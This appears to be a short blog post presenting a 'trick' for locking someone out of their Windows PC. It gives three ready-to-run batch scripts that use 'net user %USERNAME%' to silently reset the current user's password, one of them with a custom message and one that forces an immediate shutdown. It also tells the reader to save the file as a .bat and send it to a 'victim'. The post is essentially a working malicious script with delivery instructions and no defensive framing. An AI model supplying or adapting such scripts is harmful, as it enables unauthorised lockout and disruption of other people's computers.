Change Some1 PC Password With Batch:

This Trick Is On Sending Your Victim A Batch File And It Will Change There Windows Password!

Ok 1st.. Open Notepad Type One Of The Following..
(Choices On What Will Happen To The Victim's Computer)
........................................
.........................................................
Choices :
.................................................................................................
Code with personal message:

@echo off
net user %USERNAME% (The new password) > NUL
echo (Your personal message)
pause > NUL

.................................................................................................

Code without personal message:

@net user %USERNAME% (The new password) > NUL

.................................................................................................

Code with shutdown command (Shutdown's victims PC after execute):

@net user %USERNAME% (The new password) > NUL
@shutdown -s -t 0

.................................................................................................

[The Dots Are To Seperate The Methods!]

Ok Now Go To File , Save As , Anything.bat And Then Send It To Your Victim And There Password Will Change To Whatever You Like!

Example : @net user Bobby "Password123" > NUL
@shutdown -s -t 0

0 comments: